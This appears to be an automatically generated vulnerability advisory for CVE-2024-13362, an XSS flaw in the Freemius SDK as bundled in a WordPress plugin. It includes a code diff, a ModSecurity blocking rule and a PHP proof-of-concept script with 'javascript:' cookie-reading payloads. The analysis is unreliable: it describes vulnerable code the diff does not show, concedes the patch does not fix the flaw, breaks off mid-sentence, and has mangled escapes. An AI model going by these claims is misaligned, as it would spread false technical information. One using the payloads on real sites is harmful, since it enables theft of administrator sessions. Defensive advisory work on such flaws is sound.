Atomic Edge analysis of CVE-2024-13362:
This vulnerability is a Reflected DOM-Based Cross-Site Scripting (XSS) in the Freemius SDK, as used by multiple WordPress plugins and themes. The vulnerable component is the Freemius library (versions <= 2.10.1) where the 'url' parameter is insufficiently sanitized and escaped before being output in a JavaScript context. The CVSS score is 6.1, indicating medium severity, but the widespread use of the Freemius SDK across many plugins amplifies the potential impact.
The root cause lies in the Freemius admin notice manager, specifically in `class-fs-admin-notice-manager.php`. The `_add_sticky_dismiss_javascript()` method (line 197) outputs a JavaScript template `sticky-admin-notice-js.php` (or the older pattern before the patch) that reads the `url` parameter from the DOM and uses it in a `window.location` or similar redirect/action without proper sanitization or encoding. The diff shows the patch changed the template loading logic around lines 194-201 to check for the template's existence before including it. However, the core XSS issue is that the JavaScript code included via `fs_require_once_template()` processes user-controlled input via the `url` parameter in the URL query string without escaping for HTML or JavaScript context. The vulnerable code path starts at the `add_sticky()` method (line ~24000 in class-freemius.php) which assembles HTML with the `trial_promotion_message` filter. Although the patch restructures the HTML output, the XSS vector via the `url` parameter remains the primary concern.
Exploitation requires tricking a user into clicking a crafted link. The attacker constructs a URL pointing to any page that loads the Freemius SDK, such as a WordPress admin page or front-end page that uses a Freemius-integrated plugin. The malicious `url` parameter contains a `javascript:` URI or an event handler (e.g., `onmouseover`, `onload`) that executes arbitrary JavaScript. For example: `https://target.com/wp-admin/admin.php?page=some-freemius-page&url=javascript:alert(document.cookie)`. When the admin notice renders, the JavaScript template processes the `url` parameter and writes it unsanitized into the DOM, causing script execution. The vulnerability is classified as DOM-Based XSS because the payload is executed client-side via JavaScript that manipulates the document object model.
The patch in `class-fs-admin-notice-manager.php` (lines 194-201) now checks if the template file `sticky-admin-notice-js.php` exists before including it. This is a security hardening step that prevents inclusion of non-existent or potentially malicious template files. However, this is not a direct fix for the XSS itself. The actual fix for the XSS should be in the JavaScript template to sanitize the `url` parameter or use safe assignment methods (e.g., `textContent` instead of `innerHTML`). The diff also includes a change in `class-freemius.php` at line 24000 where the button and trial promotion message are restructured into a `
The impact is that an unauthenticated attacker can execute arbitrary JavaScript in the context of a logged-in administrator’s browser. This allows the attacker to steal session cookies, perform privileged actions on behalf of the admin (e.g., creating new admin accounts, installing malicious plugins, exfiltrating sensitive data), or redirect users to phishing pages. The attack requires user interaction (clicking a link), but since the payload is executed in the admin context, the potential damage is significant.
Differential between vulnerable and patched code
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/open-user-map/freemius/includes/class-freemius.php
+++ b/open-user-map/freemius/includes/class-freemius.php
@@ -24000,13 +24000,15 @@
// Start trial button.
$button = ' ' . sprintf(
- '<a style="margin-left: 10px; vertical-align: super;" href="%s"><button class="button button-primary">%s ➜</button></a>',
+ '<div><a class="button button-primary" href="%s">%s ➜</a></div>',
$trial_url,
$this->get_text_x_inline( 'Start free trial', 'call to action', 'start-free-trial' )
);
+ $message_text = $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string}" );
+
$this->_admin_notices->add_sticky(
- $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string} {$button}" ),
+ "<div class="fs-trial-message-container"><div>{$message_text}</div> {$button}</div>",
'trial_promotion',
'',
'promotion'
@@ -25476,7 +25478,7 @@
$img_dir = WP_FS__DIR_IMG;
// Locate the main assets folder.
- if ( 1 < count( $fs_active_plugins->plugins ) ) {
+ if ( ! empty( $fs_active_plugins->plugins ) ) {
$plugin_or_theme_img_dir = ( $this->is_plugin() ? WP_PLUGIN_DIR : get_theme_root( get_stylesheet() ) );
foreach ( $fs_active_plugins->plugins as $sdk_path => &$data ) {
--- a/open-user-map/freemius/includes/class-fs-plugin-updater.php
+++ b/open-user-map/freemius/includes/class-fs-plugin-updater.php
@@ -542,24 +542,8 @@
global $wp_current_filter;
- $current_plugin_version = $this->_fs->get_plugin_version();
-
- if ( ! empty( $wp_current_filter ) && 'upgrader_process_complete' === $wp_current_filter[0] ) {
- if (
- is_null( $this->_update_details ) ||
- ( is_object( $this->_update_details ) && $this->_update_details->new_version !== $current_plugin_version )
- ) {
- /**
- * After an update, clear the stored update details and reparse the plugin's main file in order to get
- * the updated version's information and prevent the previous update information from showing up on the
- * updates page.
- *
- * @author Leo Fajardo (@leorw)
- * @since 2.3.1
- */
- $this->_update_details = null;
- $current_plugin_version = $this->_fs->get_plugin_version( true );
- }
+ if ( ! empty( $wp_current_filter ) && in_array( 'upgrader_process_complete', $wp_current_filter ) ) {
+ return $transient_data;
}
if ( ! isset( $this->_update_details ) ) {
@@ -568,7 +552,7 @@
false,
fs_request_get_bool( 'force-check' ),
FS_Plugin_Updater::UPDATES_CHECK_CACHE_EXPIRATION,
- $current_plugin_version
+ $this->_fs->get_plugin_version()
);
$this->_update_details = false;
--- a/open-user-map/freemius/includes/entities/class-fs-plugin-plan.php
+++ b/open-user-map/freemius/includes/entities/class-fs-plugin-plan.php
@@ -13,7 +13,6 @@
/**
* Class FS_Plugin_Plan
*
- * @property FS_Pricing[] $pricing
*/
class FS_Plugin_Plan extends FS_Entity {
--- a/open-user-map/freemius/includes/entities/class-fs-site.php
+++ b/open-user-map/freemius/includes/entities/class-fs-site.php
@@ -10,16 +10,16 @@
exit;
}
- /**
- * @property int $blog_id
- */
- #[AllowDynamicProperties]
class FS_Site extends FS_Scope_Entity {
/**
* @var number
*/
public $site_id;
/**
+ * @var int
+ */
+ public $blog_id;
+ /**
* @var number
*/
public $plugin_id;
--- a/open-user-map/freemius/includes/entities/class-fs-user.php
+++ b/open-user-map/freemius/includes/entities/class-fs-user.php
@@ -48,6 +48,19 @@
parent::__construct( $user );
}
+ /**
+ * This method removes the deprecated 'is_beta' property from the serialized data.
+ * Should clean up the serialized data to avoid PHP 8.2 warning on next execution.
+ *
+ * @return void
+ */
+ function __wakeup() {
+ if ( property_exists( $this, 'is_beta' ) ) {
+ // If we enter here, and we are running PHP 8.2, we already had the warning. But we sanitize data for next execution.
+ unset( $this->is_beta );
+ }
+ }
+
function get_name() {
return trim( ucfirst( trim( is_string( $this->first ) ? $this->first : '' ) ) . ' ' . ucfirst( trim( is_string( $this->last ) ? $this->last : '' ) ) );
}
--- a/open-user-map/freemius/includes/managers/class-fs-admin-menu-manager.php
+++ b/open-user-map/freemius/includes/managers/class-fs-admin-menu-manager.php
@@ -699,16 +699,36 @@
$menu = $this->find_main_submenu();
}
+ $menu_slug = $menu['menu'][2];
$parent_slug = isset( $menu['parent_slug'] ) ?
- $menu['parent_slug'] :
- 'admin.php';
+ $menu['parent_slug'] :
+ 'admin.php';
- return admin_url(
- $parent_slug .
- ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
- 'page=' .
- $menu['menu'][2]
- );
+ if ( fs_apply_filter( $this->_module_unique_affix, 'enable_cpt_advanced_menu_logic', false ) ) {
+ $parent_slug = 'admin.php';
+
+ /**
+ * This line and the `if` block below it are based on the `menu_page_url()` function of WordPress.
+ *
+ * @author Leo Fajardo (@leorw)
+ * @since 2.10.2
+ */
+ global $_parent_pages;
+
+ if ( ! empty( $_parent_pages[ $menu_slug ] ) ) {
+ $_parent_slug = $_parent_pages[ $menu_slug ];
+ $parent_slug = isset( $_parent_pages[ $_parent_slug ] ) ?
+ $parent_slug :
+ $menu['parent_slug'];
+ }
+ }
+
+ return admin_url(
+ $parent_slug .
+ ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
+ 'page=' .
+ $menu_slug
+ );
}
/**
--- a/open-user-map/freemius/includes/managers/class-fs-admin-notice-manager.php
+++ b/open-user-map/freemius/includes/managers/class-fs-admin-notice-manager.php
@@ -194,8 +194,14 @@
* @since 1.0.7
*/
static function _add_sticky_dismiss_javascript() {
+ $sticky_admin_notice_js_template_name = 'sticky-admin-notice-js.php';
+
+ if ( ! file_exists( fs_get_template_path( $sticky_admin_notice_js_template_name ) ) ) {
+ return;
+ }
+
$params = array();
- fs_require_once_template( 'sticky-admin-notice-js.php', $params );
+ fs_require_once_template( $sticky_admin_notice_js_template_name, $params );
}
private static $_added_sticky_javascript = false;
--- a/open-user-map/freemius/start.php
+++ b/open-user-map/freemius/start.php
@@ -15,7 +15,7 @@
*
* @var string
*/
- $this_sdk_version = '2.10.1';
+ $this_sdk_version = '2.11.0';
#region SDK Selection Logic --------------------------------------------------------------------
--- a/open-user-map/open-user-map.php
+++ b/open-user-map/open-user-map.php
@@ -8,7 +8,7 @@
Plugin URI: https://wordpress.org/plugins/open-user-map/
Description: Engage your visitors with an interactive map – let them add markers instantly or create a custom map showcasing your favorite spots.
Author: 100plugins
-Version: 1.4.0
+Version: 1.4.1
Author URI: https://www.open-user-map.com/
License: GPLv3 or later
Text Domain: open-user-map
--- a/open-user-map/templates/block-locations-list.php
+++ b/open-user-map/templates/block-locations-list.php
@@ -24,7 +24,7 @@
// Custom Attribute: Filter for ids
if ( isset( $block_attributes['ids'] ) && $block_attributes['ids'] != '' ) {
$selected_ids = explode( '|', $block_attributes['ids'] );
- $query['include'] = $selected_ids;
+ $query['post__in'] = $selected_ids;
}
// Init WP_Query
$locations_query = new WP_Query($query);
--- a/open-user-map/templates/page-backend-settings.php
+++ b/open-user-map/templates/page-backend-settings.php
@@ -1899,7 +1899,7 @@
?>"></textarea><br><br>
<span class="description"><?php
echo __( 'Available tags' );
- ?>: %title%, %website_url%, %website_name%, %edit_location_url%</span>
+ ?>: %title%, %website_url%, %website_name%, %edit_location_url%, %user_name%, %user_email%</span>
<br><br>
</td>
</tr>
--- a/open-user-map/templates/partial-map-init.php
+++ b/open-user-map/templates/partial-map-init.php
@@ -150,7 +150,7 @@
// Custom Attribute: Filter for ids
if ( isset( $block_attributes['ids'] ) && $block_attributes['ids'] != '' ) {
$selected_ids = explode( '|', $block_attributes['ids'] );
- $query['include'] = $selected_ids;
+ $query['post__in'] = $selected_ids;
}
// Custom Attribute: Pre-select region
if ( isset( $regions ) && isset( $block_attributes['region'] ) && $block_attributes['region'] != '' ) {
@@ -227,16 +227,23 @@
$custom_fields = [];
$meta_custom_fields = ( isset( $location_meta['custom_fields'] ) ? $location_meta['custom_fields'] : false );
if ( is_array( $meta_custom_fields ) && is_array( $active_custom_fields ) ) {
- foreach ( $meta_custom_fields as $index => $field_value ) {
- if ( isset( $active_custom_fields[$index] ) && !isset( $active_custom_fields[$index]['private'] ) ) {
- $custom_fields[] = [
- 'index' => $index,
- 'label' => $active_custom_fields[$index]['label'],
- 'val' => $field_value,
- 'fieldtype' => $active_custom_fields[$index]['fieldtype'],
- 'uselabelastextoption' => ( isset( $active_custom_fields[$index]['uselabelastextoption'] ) ? $active_custom_fields[$index]['uselabelastextoption'] : false ),
- ];
+ // Iterate over active_custom_fields to maintain order
+ foreach ( $active_custom_fields as $index => $custom_field ) {
+ // Skip if field is marked as private
+ if ( isset( $custom_field['private'] ) ) {
+ continue;
}
+ // Skip if no value exists for this field
+ if ( !isset( $meta_custom_fields[$index] ) ) {
+ continue;
+ }
+ $custom_fields[] = [
+ 'index' => $index,
+ 'label' => $custom_field['label'],
+ 'val' => $meta_custom_fields[$index],
+ 'fieldtype' => ( isset( $custom_field['fieldtype'] ) ? $custom_field['fieldtype'] : 'text' ),
+ 'uselabelastextoption' => ( isset( $custom_field['uselabelastextoption'] ) ? $custom_field['uselabelastextoption'] : false ),
+ ];
}
}
if ( isset( $location_types ) && is_array( $location_types ) && count( $location_types ) == 1 && !get_option( 'oum_enable_multiple_marker_types' ) ) {ModSecurity Protection Against This CVE
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2024-13362
# This virtual patch blocks reflected XSS attempts via the url parameter in Freemius SDK admin pages.
# Targets any URL that includes 'url=' parameter with javascript: or event handler patterns.
# Prevents exploitation by blocking requests with malicious script URIs in the url parameter.
SecRule REQUEST_URI "@rx /wp-admin/" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362',tag:'wordpress',tag:'xss'"
SecRule ARGS:url "@rx (?:javascript|data|vbscript):" "chain"
SecRule ARGS:url "@rx (?:alert|prompt|confirm|eval|document.cookie|fetch|XMLHttpRequest)" "t:lowercase"
Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter
// Configuration
$target_url = 'https://example.com/wp-admin/admin.php?page=freemius-integration-page'; // Replace with actual page that uses Freemius SDK
// The XSS payload: use a javascript: URI that triggers on load
$payload = 'javascript:alert("XSS")';
// Construct the malicious URL
$malicious_url = $target_url . (strpos($target_url, '?') === false ? '?' : '&') . 'url=' . urlencode($payload);
echo "[+] CVE-2024-13362 PoCn";
echo "[+] Target URL: $target_urln";
echo "[+] Malicious URL: $malicious_urln";
echo "[+] Sending request...n";
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIE, ''); // Add session cookie if needed for authenticated context
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200) {
echo "[+] Request succeeded (HTTP 200). Checking if payload injected...n";
// Check if the payload appears in the response (simple check)
if (strpos($response, 'alert(') !== false) {
echo "[+] XSS payload appears to be reflected in the response.n";
echo "[+] To exploit manually, open the following URL in a browser:n";
echo $malicious_url . "n";
} else {
echo "[!] Payload may not be reflected. The vulnerability may require admin context or specific page.n";
}
} else {
echo "[!] Request failed with HTTP code: $http_coden";
}
// Note: This PoC may need to be run with a valid session cookie for admin pages that require authentication.
// The actual exploitation requires a user to click the link, but this script verifies request handling.
